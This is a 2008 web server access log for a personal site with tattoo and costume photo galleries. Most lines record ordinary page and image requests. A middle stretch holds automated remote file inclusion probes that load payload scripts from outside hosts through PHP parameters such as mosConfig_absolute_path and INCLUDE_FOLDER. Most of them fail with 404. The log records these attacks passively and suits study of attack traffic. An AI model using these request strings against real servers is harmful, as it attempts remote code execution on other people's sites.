71.236.164.35 - - [28/Jul/2008:22:59:41 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:41 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:41 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:42 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:42 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:42 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:42 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:42 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:22:59:42 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:00 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:01 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1762 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:08 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:09 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:09 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:21 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:21 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:21 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
71.236.164.35 - - [28/Jul/2008:23:00:21 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_4; en-us) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.20.1"
195.42.160.22 - - [28/Jul/2008:23:01:23 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:23:01:23 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 313 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:23:01:23 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.48"
195.42.160.22 - - [28/Jul/2008:23:01:23 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.48"
201.17.3.26 - - [28/Jul/2008:23:02:28 -0500] "GET /logs/index.php?site=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
201.17.3.26 - - [28/Jul/2008:23:02:32 -0500] "GET /index.php?site=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
72.52.131.56 - - [28/Jul/2008:23:02:34 -0500] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.811"
72.52.131.56 - - [28/Jul/2008:23:02:34 -0500] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.811"
190.54.62.66 - - [28/Jul/2008:23:05:35 -0500] "GET /logs/access_log.1213315200//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:05:36 -0500] "GET /logs/index.php?site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:05:36 -0500] "GET /index.php?site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
193.207.106.54 - - [28/Jul/2008:23:07:57 -0500] "GET /errors.php?error=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
193.207.106.54 - - [28/Jul/2008:23:07:57 -0500] "GET /logs/errors.php?error=http://iraqmarkets.com//ray/modules/global/inc/oye.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
190.54.62.66 - - [28/Jul/2008:23:08:02 -0500] "GET /logs/access_log.1213142400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h-pro.ru/lang/inc? HTTP/1.1" 404 374 "-""libwww-perl/5.79"
194.201.253.2 - - [28/Jul/2008:23:09:02 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:23:09:02 -0500] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 337 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:23:09:04 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
194.201.253.2 - - [28/Jul/2008:23:09:04 -0500] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.810"
200.99.76.3 - - [28/Jul/2008:23:10:12 -0500] "GET /logs/errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
200.99.76.3 - - [28/Jul/2008:23:10:12 -0500] "GET /errors.php?error=http://www.tunjacoby.com/genealogie/English/idnews.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET /logs/access_log.1212883200//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET /logs/access_log.1212883200//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET /logs/access_log.1212883200//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 322 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET //errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET //errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET //errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET /logs//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:35 -0500] "GET /logs//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
66.199.246.51 - - [28/Jul/2008:23:11:36 -0500] "GET /logs//errors.php?error=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
81.198.180.10 - - [28/Jul/2008:23:13:23 -0500] "GET /logs/access_log.1214438400//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:23:13:23 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
81.198.180.10 - - [28/Jul/2008:23:13:24 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
209.97.201.148 - - [28/Jul/2008:23:13:53 -0500] "GET /logs//photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
209.97.201.148 - - [28/Jul/2008:23:13:53 -0500] "GET //photohk/photohk_64.html//index.php?DOCUMENT_ROOT=http://sujianto.com/load.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
210.245.87.117 - - [28/Jul/2008:23:14:23 -0500] "GET /logs/networknewz-10-20031020NetCatSecurity.html/netcat_files/articles/condition_choice2//netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 402 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:14:24 -0500] "GET /networknewz-10-20031020NetCatSecurity.html/netcat_files/articles/condition_choice2//netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 397 "-""libwww-perl/5.805"
216.193.201.57 - - [28/Jul/2008:23:14:36 -0500] "GET /logs/access_log.1212883200//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://www.geocities.com/ojolah/find.txt? HTTP/1.1" 404 353 "-""libwww-perl/5.75"
67.15.80.42 - - [28/Jul/2008:23:14:48 -0500] "GET /logs/index.php?site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
67.15.80.42 - - [28/Jul/2008:23:14:48 -0500] "GET /index.php?site=http://dicafree.com/zboard/DQ_LIBS/icon/safe1.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
210.245.87.117 - - [28/Jul/2008:23:14:56 -0500] "GET /logs/map//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 303 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:14:56 -0500] "GET /map//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:15:11 -0500] "GET /logs/networknewz-10-20031020NetCatSecurity.html/netcat_files/articles/condition_choice2//netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 402 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:15:12 -0500] "GET /networknewz-10-20031020NetCatSecurity.html/netcat_files/articles/condition_choice2//netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 397 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:15:24 -0500] "GET /logs/articles/Tools-Trade-Part2.html/netcat_files/articles/condition_choice2//netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 391 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:15:24 -0500] "GET /articles/Tools-Trade-Part2.html/netcat_files/articles/condition_choice2//netcat_files/Image//index.php?DOCUMENT_ROOT=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 386 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:15:46 -0500] "GET /logs/?q=node/7/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 93161 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:15:48 -0500] "GET /?q=node/7/join.php?INCLUDE_FOLDER=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
209.25.133.199 - - [28/Jul/2008:23:15:55 -0500] "GET /logs/join.php?INCLUDE_FOLDER=http://sujianto.com/load.txt?? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
209.25.133.199 - - [28/Jul/2008:23:15:55 -0500] "GET /join.php?INCLUDE_FOLDER=http://sujianto.com/load.txt?? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
195.42.160.22 - - [28/Jul/2008:23:16:21 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.0" 404 308 "-""libwww-perl/5.48"
72.248.189.82 - - [28/Jul/2008:23:18:35 -0500] "GET /logs/access_log.1213142400%20//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 375 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:18:35 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
72.248.189.82 - - [28/Jul/2008:23:18:35 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:19:20 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
210.245.87.117 - - [28/Jul/2008:23:19:20 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
74.69.251.226 - - [28/Jul/2008:23:20:23 -0500] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costume_designer""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:23 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:27 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:27 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:27 -0500] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:27 -0500] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:27 -0500] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:30 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:30 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:32 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
74.69.251.226 - - [28/Jul/2008:23:20:33 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko) Safari/419.3"
